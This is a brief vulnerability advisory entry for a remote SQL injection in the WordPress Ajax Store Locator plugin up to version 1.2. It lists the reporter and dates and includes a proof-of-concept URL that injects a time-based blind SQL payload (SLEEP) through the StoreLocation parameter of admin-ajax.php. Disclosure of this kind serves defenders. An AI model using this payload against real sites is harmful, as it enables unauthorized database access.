Ajax Store Locator <= 1.2 - Remote SQL Injection

2015-04-16T00:00:00
ID WPVDB-ID:7907
Type wpvulndb
Reporter pvdl
Modified 2019-10-21T00:00:00

Description

WordPress Vulnerability - Ajax Store Locator <= 1.2 - Remote SQL Injection http://www.example.com/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod;=SearchStore&Location;=Social&StoreLocation;=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)